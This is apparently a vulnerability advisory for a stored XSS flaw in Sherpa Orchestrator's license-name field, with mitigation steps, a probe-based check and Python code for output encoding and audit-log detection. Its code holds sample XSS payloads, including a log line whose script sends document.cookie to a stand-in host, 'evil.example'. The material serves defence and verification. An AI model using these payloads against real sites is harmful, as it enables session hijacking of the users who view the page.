CVE-2025-46545

4.4 MEDIUM

📋 TL;DR

CVE-2025-46545 is a stored cross-site scripting (XSS) flaw in Sherpa Orchestrator version 141851. A user with administrator rights to license management can store a script payload in the license name parameter; the stored value is later written into the page without encoding and executes in the browser of whoever views the license expiry notice once that license has expired. Planting the payload requires administrator privileges, which is why the severity is only MEDIUM (4.4), but the victims are the users, including other administrators, who view the expired-license message.

💻 Affected Systems

Products:
  • Sherpa Orchestrator
Versions: 141851
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires administrator access to license management functionality.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A malicious or compromised administrator plants the payload once; each time another user (including another administrator) views the expired-license notice, the script runs in that user's session and can read session cookies not protected by HttpOnly, submit requests with the victim's privileges, or redirect the victim to an attacker-controlled site.

🟠

Likely Case

Escalation from a license-management role to the privileges of a higher-level administrator who views the license page, hijacking of that user's session, or defacement of the license management pages.

🟢

If Mitigated

Limited: exploitation needs administrator credentials, and the payload only fires after a specific trigger (license expiration), so the attack is slow, noisy and attributable to the account that stored the payload.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires administrator credentials and a standard XSS payload; the only non-obvious step is that the payload fires when the license expires rather than immediately on save. A public proof-of-concept exists in a GitHub gist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://sherparpa.com

Restart Required: No

Instructions:

1. Check the vendor advisory at sherparpa.com for updates.
2. Apply any available patch.
3. Validate the fix: store a harmless probe such as <u>test</u> as a license name and confirm that the expiry notice renders it entity-encoded rather than as markup.

🔧 Temporary Workarounds

Output Encoding and Input Validation for License Names

all

The root cause is that the stored license name is written into the expiry notice without contextual HTML encoding. Entity-encode it at every point where it is rendered (text and attribute contexts alike); treat input validation as defense in depth, not as the fix.

Encode on output in the license management code and, additionally, allowlist license names server-side to an expected character set and length; client-side checks alone can be bypassed with a direct request.

Content Security Policy

all

A CSP that forbids inline scripts (a nonce- or hash-based script-src without 'unsafe-inline') stops the injected payload from executing even though it remains stored; a policy that allows 'unsafe-inline' gives no protection against this class of bug.

Add a Content-Security-Policy header at the web server or reverse proxy in front of Sherpa Orchestrator; deploy it as Content-Security-Policy-Report-Only first to confirm the application's own inline scripts do not break.
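The encoding workaround and the verification probe described in "How to Verify" in code, as an added illustration that is not Sherpa Orchestrator's code (the vendor's rendering path is not public here). It models the vulnerable sink as an expiry notice that interpolates the stored license name into HTML, shows the same notice rendered with contextual HTML encoding, adds a server-side allowlist whose character set is an assumed policy rather than a vendor rule, and classifies how a harmless probe comes back from the rendered page.

```python
"""Added example (not Sherpa Orchestrator code): the license-name stored XSS
pattern, its output-encoding fix, and the probe check used to verify it.

Assumptions: the vulnerable page interpolates the stored license name into the
HTML of an expiry notice; the allowlist in validate_license_name is an
illustrative policy, not a vendor rule.
"""
import re
from html import escape

# Constructed payload of the kind a malicious administrator could store as a license name.
PAYLOAD = '<img src=x onerror="alert(document.cookie)">'


def make_probe(marker: str) -> str:
    """Harmless verification probe: a unique marker wrapped in a tag that must
    never survive as markup. Use this, never a real script payload, on live systems."""
    return f"<u>{marker}</u>"


def render_expiry_notice_vulnerable(license_name: str) -> str:
    # The stored value is dropped straight into markup: this is the stored-XSS sink.
    return f'<div class="alert">License "{license_name}" has expired.</div>'


def render_expiry_notice_hardened(license_name: str) -> str:
    # Contextual output encoding: & < > " ' become entities, so the value can
    # neither open a tag nor break out of the quoted text it sits in.
    return f'<div class="alert">License "{escape(license_name, quote=True)}" has expired.</div>'


def validate_license_name(name: str) -> str:
    """Defense-in-depth server-side allowlist (assumed policy): letters, digits,
    space and a few punctuation marks, 1-64 characters. Raises ValueError otherwise.
    This complements output encoding; it does not replace it."""
    if not (1 <= len(name) <= 64) or not re.fullmatch(r"[A-Za-z0-9 ._()-]+", name):
        raise ValueError("license name contains disallowed characters or length")
    return name


def classify_reflection(rendered_html: str, marker: str) -> str:
    """How did the probe for `marker` come back in the rendered page?
    'raw'      - markup survived unencoded: vulnerable
    'encoded'  - entity-encoded: the fix is in place at this sink
    'filtered' - marker present but tags stripped: a filter, not encoding; verify other contexts
    'absent'   - marker missing entirely: wrong page, or the value was rejected on input"""
    probe = make_probe(marker)
    if probe in rendered_html:
        return "raw"
    if escape(probe, quote=True) in rendered_html:
        return "encoded"
    if marker in rendered_html:
        return "filtered"
    return "absent"
```

Run `classify_reflection` against the HTML of the expiry notice (and any other page that shows the license name) after storing `make_probe("xs7f3a")` as the license name in a non-production instance; only "encoded" confirms the fix, and "filtered" means a blocklist is in play that should be tested in every rendering context.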

🧯 If You Can't Patch

  • Restrict administrator access to only trusted personnel
  • Monitor license management activities and audit logs for suspicious inputs

🔍 How to Verify

Check if Vulnerable:

In a non-production instance, store a harmless probe such as <u>xsstest</u> as a license name, let (or force) that license expire, and check whether the expiry notice renders the probe as markup (vulnerable) or as entity-encoded text (not vulnerable). Do not use a live script payload on production systems.

Check Version:

Check Sherpa Orchestrator version in administration panel or configuration files

Verify Fix Applied:

Confirm that the probe is rendered entity-encoded (&lt;u&gt;...&lt;/u&gt;) in the expiry notice and in every other page that displays the license name, and that no script executes.

📡 Detection & Monitoring

Log Indicators:

  • Unusual license name entries containing script tags or JavaScript
  • Multiple license updates from single administrator

Network Indicators:

  • HTTP requests with script payloads in license name parameters

SIEM Query:

Search license management events for script indicators such as <script, javascript:, inline event handlers (onerror=, onload=, ...) and eval(; decode URL-encoding and HTML entities before matching, since payloads are normally submitted percent-encoded and a naive substring match on "<script>" will miss them.
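The log and SIEM indicators above as runnable detection logic, added here as an example that is not vendor code. The audit-log lines are constructed, and the field names (user, action, licenseName) are assumed; map them to the real Sherpa Orchestrator audit schema. The scan decodes percent-encoding (twice, to catch double encoding) and HTML entities before pattern matching, and also counts license updates per administrator for the volume indicator.

```python
"""Added detection example (not vendor code) for the license-name XSS indicators,
run over constructed audit-log lines. Field names are assumed."""
import re
from collections import Counter
from html import unescape
from urllib.parse import unquote, unquote_plus

# Constructed sample audit-log lines. Payloads are URL-encoded as a browser
# would submit them, so a naive substring search for "<script>" misses them.
SAMPLE_LOGS = [
    "2025-05-01T09:12:03Z user=alice action=license.update licenseName=Enterprise+2025",
    "2025-05-01T09:14:51Z user=mallory action=license.update "
    "licenseName=%3Cscript%3Efetch%28%27//evil.example/c%3F%27%2Bdocument.cookie%29%3C/script%3E",
    "2025-05-01T09:15:10Z user=mallory action=license.update "
    "licenseName=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E",
    "2025-05-01T09:16:22Z user=mallory action=license.update "
    "licenseName=&lt;svg+onload=alert(1)&gt;",
    "2025-05-01T10:02:00Z user=bob action=license.view licenseName=Enterprise+2025",
]

XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),            # inline event handlers: onerror=, onload=, ...
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
]

# Assumed log layout: key=value pairs; licenseName is the injection point.
LINE_RE = re.compile(r"user=(?P<user>\S+) action=(?P<action>\S+) licenseName=(?P<name>\S*)")


def normalize(value: str) -> str:
    """Undo the encodings an attacker or the transport may have applied:
    form encoding (+ and %XX), a second percent-decode for double encoding,
    then HTML entities."""
    value = unquote_plus(value)
    value = unquote(value)
    return unescape(value)


def scan_line(line: str):
    """Return (user, decoded_name, matched_patterns) for a license event, else None."""
    m = LINE_RE.search(line)
    if not m or not m.group("action").startswith("license."):
        return None
    decoded = normalize(m.group("name"))
    hits = [p.pattern for p in XSS_PATTERNS if p.search(decoded)]
    return m.group("user"), decoded, hits


def find_suspicious(lines):
    """All license events whose decoded license name matches at least one indicator."""
    results = []
    for line in lines:
        r = scan_line(line)
        if r and r[2]:
            results.append(r)
    return results


def updates_per_user(lines) -> Counter:
    """license.update events per user, for the 'multiple updates from one admin' indicator."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if m and m.group("action") == "license.update":
            counts[m.group("user")] += 1
    return counts


if __name__ == "__main__":
    for user, name, hits in find_suspicious(SAMPLE_LOGS):
        print(f"ALERT user={user} licenseName={name!r} indicators={hits}")
    print("license.update counts:", dict(updates_per_user(SAMPLE_LOGS)))
```

Feed the real audit export through `find_suspicious` and alert on any hit; the decoded license name in the output is what the browser would have rendered, which makes triage straightforward.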
